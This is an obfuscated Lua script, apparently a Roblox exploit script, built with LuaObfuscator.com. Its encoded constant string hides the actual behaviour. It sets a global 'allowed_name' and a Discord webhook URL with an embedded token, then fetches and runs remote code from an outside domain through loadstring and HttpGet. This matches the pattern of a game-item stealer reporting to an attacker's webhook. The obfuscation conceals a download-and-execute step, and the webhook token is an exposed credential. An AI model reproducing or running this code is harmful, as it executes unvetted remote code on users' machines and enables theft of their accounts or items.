--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(1 + 0))))%((1 + 1)^(((v33-(878 -((1552 -(226 + 1044)) + 595))) -(v32-(2 -1))) + (1 -0))) ;return v82-(v82%((8 -6) -1)) ;else local v83=(621 -(555 + 64))^(v32-1) ;return (((v31%(v83 + v83))>=v83) and ((1049 -(32 + 85)) -(857 + 74))) or ((557 + 11) -(367 + 201)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24() local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==1) then return (v38 * 16777216) + (v37 * 65536) + (v36 * (1213 -(892 + 65))) + v35 ;end if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (5 -2) );v19=v19 + (7 -3) ;v34=351 -(87 + (443 -(67 + 113))) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29() local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39~=0) then else v40=0;v41=nil;v39=1;end if (v39==2) then v44=nil;v45=nil;v39=577 -(507 + 67) ;end if (v39==(1750 -(1013 + 736))) then v42=nil;v43=nil;v39=2 + 0 ;end if (v39~=(9 -5)) then else while true do if (v40==(0 -0)) then local v98=0;local v99;while true do if (v98~=(867 -(550 + 317))) then else v99=0 -0 ;while true do if (v99~=1) then else v40=1;break;end if (v99==(0 -0)) then v41=0;v42=nil;v99=1;end end break;end end end if (v40==3) then v47=nil;while true do local v102=0;local v103;local v104;while true do if (v102==0) then v103=0 -0 ;v104=nil;v102=1;end if (1~=v102) then else while true do if (v103~=0) then else v104=285 -(134 + 151) ;while true do if (v104==(1665 -(970 + 695))) then local v159=0;while true do if (v159==0) then if (v41==(1 -0)) then local v165=0;local v166;while true do if (v165==0) then v166=0;while true do if (v166~=0) then else local v170=1990 -(582 + 1408) ;while true do if (v170==(3 -2)) then v166=1;break;end if (v170==(0 -0)) then v46=v24();v47={};v170=3 -2 ;end end end if (v166==(1825 -(1195 + 629))) then for v175=1 -0 ,v46 do local v176=241 -(187 + 54) ;local v177;local v178;while true do if (v176==(781 -(162 + 618))) then if (v177==(1 + 0)) then v178=v22()~=0 ;elseif (v177==(2 + 0)) then v178=v25();elseif (v177~=(6 -3)) then else v178=v26();end v47[v175]=v178;break;end if (v176~=(0 -0)) then else local v181=0;while true do if ((0 + 0)~=v181) then else v177=v22();v178=nil;v181=1637 -(1373 + 263) ;end if (v181==1) then v176=1;break;end end end end end v45[1003 -(451 + 549) ]=v22();v166=2;end if (v166~=2) then else v41=2;break;end end break;end end end if (v41~=(0 + 0)) then else local v167=0;local v168;while true do if (v167==0) then v168=0 -0 ;while true do if (v168~=(2 -0)) then else v41=1385 -(746 + 638) ;break;end if (v168==1) then local v172=0 + 0 ;while true do if (v172~=(1 -0)) then else v168=2;break;end if (v172~=(341 -(218 + 123))) then else local v179=1581 -(1535 + 46) ;while true do if (0==v179) then v44={};v45={v42,v43,nil,v44};v179=1 + 0 ;end if (v179~=(1 -0)) then else v172=1468 -(899 + 568) ;break;end end end end end if (v168==(0 + 0)) then local v173=0;while true do if (v173~=(0 -0)) then else v42={};v43={};v173=1;end if (v173==(604 -(268 + 335))) then v168=291 -(60 + 230) ;break;end end end end break;end end end v159=573 -(426 + 146) ;end if (v159~=(1 + 0)) then else v104=1;break;end end end if (v104==1) then if (v41==2) then local v163=1456 -(282 + 1174) ;local v164;while true do if ((811 -(569 + 242))~=v163) then else v164=0;while true do local v169=0 -0 ;while true do if (v169==(0 + 0)) then if (v164==0) then local v174=1024 -(706 + 318) ;while true do if (v174==(1252 -(721 + 530))) then v164=1;break;end if (v174==0) then for v182=1272 -(945 + 326) ,v24() do local v183=0;local v184;local v185;local v186;while true do if (v183==(0 -0)) then v184=0;v185=nil;v183=1;end if (v183==1) then v186=nil;while true do if (v184==(1 + 0)) then while true do if ((700 -(271 + 429))==v185) then v186=v22();if (v21(v186,1 + 0 ,1)==0) then local v190=0;local v191;local v192;local v193;local v194;local v195;while true do if ((1502 -(1408 + 92))==v190) then v195=nil;while true do if (v191==(1086 -(461 + 625))) then v192=0;v193=nil;v191=1289 -(993 + 295) ;end if (v191==(1 + 1)) then while true do if ((1171 -(418 + 753))~=v192) then else local v197=0 + 0 ;while true do if (1==v197) then v192=1 + 0 ;break;end if (v197==(0 + 0)) then v193=v21(v186,1 + 1 ,532 -(406 + 123) );v194=v21(v186,1773 -(1749 + 20) ,6);v197=1 + 0 ;end end end if (v192==1) then local v198=1322 -(1249 + 73) ;while true do if (1==v198) then v192=2;break;end if (v198==(0 + 0)) then v195={v23(),v23(),nil,nil};if (v193==(0 -0)) then local v203=1900 -(106 + 1794) ;local v204;local v205;while true do if (v203~=(0 + 0)) then else v204=0 + 0 ;v205=nil;v203=2 -1 ;end if (v203~=(2 -1)) then else while true do if (v204==0) then v205=0;while true do if (v205~=0) then else v195[3]=v23();v195[4]=v23();break;end end break;end end break;end end elseif (v193==1) then v195[117 -(4 + 110) ]=v24();elseif (v193==2) then v195[3]=v24() -((586 -(57 + 527))^16) ;elseif (v193==(1430 -(41 + 1386))) then local v212=0;local v213;while true do if (v212~=0) then else v213=103 -(17 + 86) ;while true do if (v213~=0) then else v195[3 + 0 ]=v24() -(2^(35 -19)) ;v195[4]=v23();break;end end break;end end end v198=2 -1 ;end end end if (v192==(168 -(122 + 44))) then local v199=0;while true do if (v199==1) then v192=5 -2 ;break;end if (v199==(0 -0)) then if (v21(v194,1 + 0 ,1)==(1 + 0)) then v195[2]=v47[v195[2]];end if (v21(v194,2,3 -1 )~=1) then else v195[68 -(30 + 35) ]=v47[v195[3 + 0 ]];end v199=1;end end end if (v192==3) then if (v21(v194,3,3)~=(1258 -(1043 + 214))) then else v195[4]=v47[v195[15 -11 ]];end v42[v182]=v195;break;end end break;end if (v191==1) then local v196=1212 -(323 + 889) ;while true do if (v196==(0 -0)) then v194=nil;v195=nil;v196=1;end if (v196==1) then v191=582 -(361 + 219) ;break;end end end end break;end if (v190~=(320 -(53 + 267))) then else v191=0;v192=nil;v190=1;end if (v190~=(1 + 0)) then else v193=nil;v194=nil;v190=2;end end end break;end end break;end if (0~=v184) then else local v189=413 -(15 + 398) ;while true do if (v189==1) then v184=983 -(18 + 964) ;break;end if (0==v189) then v185=0 -0 ;v186=nil;v189=1 + 0 ;end end end end break;end end end for v187=1,v24() do v43[v187-(1 + 0) ]=v29();end v174=1;end end end if (v164~=1) then else return v45;end break;end end end break;end end end break;end end break;end end break;end end end break;end if (v40==(852 -(20 + 830))) then local v100=0 + 0 ;while true do if (v100==(126 -(116 + 10))) then v45=nil;v46=nil;v100=1;end if ((1 + 0)==v100) then v40=741 -(542 + 196) ;break;end end end if (v40~=(1 -0)) then else local v101=0;while true do if (v101==(1 + 0)) then v40=2;break;end if ((0 + 0)~=v101) then else v43=nil;v44=nil;v101=1;end end end end break;end if (v39~=3) then else v46=nil;v47=nil;v39=4;end end end v30=nil;v18=7;end if (v18==4) then function v25() local v48=v24();local v49=v24();local v50=1 + 0 ;local v51=(v21(v49,(4 -2) -1 ,51 -31 ) * ((1553 -(1126 + 425))^(437 -(118 + 287)))) + v48 ;local v52=v21(v49,82 -61 ,31);local v53=((v21(v49,(336 + 817) -(118 + 1003) )==1) and  -((9 -7) -1)) or (378 -(142 + 235)) ;if (v52==(0 -0)) then if (v51==(0 + 0)) then return v53 * (977 -(553 + 424)) ;else local v89=(753 -(239 + 514)) -0 ;while true do if (v89==0) then v52=1 + 0 ;v50=0 + 0 ;break;end end end elseif (v52==(1192 + 855)) then return ((v51==0) and (v53 * ((1 + 0)/0))) or (v53 * NaN) ;end return v8(v53,v52-(585 + 154 + 284) ) * (v50 + (v51/((4 -2)^(144 -92)))) ;end v26=nil;function v26(v54) local v55=1329 -((1179 -382) + 532) ;local v56;local v57;while true do if (v55==(1 + 0)) then v56=v3(v16,v19,(v19 + v54) -(1 + 0) );v19=v19 + v54 ;v55=4 -2 ;end if ((1202 -(373 + (1165 -(144 + 192))))==v55) then v56=nil;if  not v54 then local v97=731 -(476 + 255) ;while true do if (v97==(1130 -((585 -(42 + 174)) + 572 + 189))) then v54=v24();if (v54==(0 + 0)) then return "";end break;end end end v55=1 -0 ;end if (v55==2) then v57={};for v90=1 -0 , #v56 do v57[v90]=v2(v1(v3(v56,v90,v90)));end v55=(200 + 41) -(64 + 174) ;end if (v55==(1 + 2)) then return v6(v57);end end end v18=5;end if (v18==2) then function v22() local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23() local v59,v60=v1(v16,v19,v19 + (1506 -(363 + 1141)) );v19=v19 + 1 + 1 ;return (v60 * (779 -523)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61) if (v1(v61,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v61,1,1));return "";end end else local v85=v2(v0(v61,16));if v20 then local v92=v5(v85,v20);v20=nil;return v92;else return v85;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64) local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81>0) then do return;end else v78[v80[2]][v80[3]]=v80[4];end elseif (v81>2) then v78[v80[2]]=v80[3];else v78[v80[2]]();end elseif (v81<=5) then if (v81==4) then local v109=0;local v110;local v111;while true do if (v109==0) then v110=v80[2];v111=v78[v80[3]];v109=1;end if (v109==1) then v78[v110 + 1 ]=v111;v78[v110]=v111[v80[4]];break;end end else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=6) then local v114=0;local v115;while true do if (v114==0) then v115=v80[2];v78[v115]=v78[v115](v13(v78,v115 + 1 ,v73));break;end end elseif (v81==7) then do return;end else local v133=0;local v134;local v135;local v136;local v137;while true do if (v133==2) then for v160=v134,v73 do v137=v137 + 1 ;v78[v160]=v135[v137];end break;end if (1==v133) then v73=(v136 + v134) -1 ;v137=0;v133=2;end if (v133==0) then v134=v80[2];v135,v136=v71(v78[v134](v13(v78,v134 + 1 ,v80[3])));v133=1;end end end elseif (v81<=12) then if (v81<=10) then if (v81>9) then v78[v80[2]]=v80[3];else v78[v80[2]]=v64[v80[3]];end elseif (v81==11) then local v120=v80[2];local v121,v122=v71(v78[v120](v13(v78,v120 + 1 ,v80[3])));v73=(v122 + v120) -1 ;local v123=0;for v131=v120,v73 do local v132=0;while true do if (v132==0) then v123=v123 + 1 ;v78[v131]=v121[v123];break;end end end else local v124=0;local v125;while true do if (v124==0) then v125=v80[2];v78[v125]=v78[v125]();break;end end end elseif (v81<=14) then if (v81==13) then local v126=0;local v127;local v128;while true do if (v126==1) then v78[v127 + 1 ]=v128;v78[v127]=v128[v80[4]];break;end if (v126==0) then v127=v80[2];v128=v78[v80[3]];v126=1;end end else local v129=v80[2];v78[v129]=v78[v129](v13(v78,v129 + 1 ,v73));end elseif (v81<=15) then v78[v80[2]]();elseif (v81>16) then local v138=v80[2];v78[v138]=v78[v138]();else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end return v15("LOL!093O0003073O0067657467656E76030C3O00612O6C6F7765645F6E616D6503063O005363652O6E3703073O00776562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323438322O343338303834363738343531322F5F79324D6B526E4D54596A4D48656353685F5665633047756C347472516935386F6D6679356C74757953635869324846326A636743304D64434273366575446157314C66030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F65676F72696B7573612E73706163652F61646F7074000E3O0012093O00014O000C3O0001000200304O000200030012093O00014O000C3O0001000200304O000400050012093O00063O001209000100073O00200D00010001000800120A000300094O000B000100034O000E5O00022O00023O000100012O00013O00017O00",v9(),...);
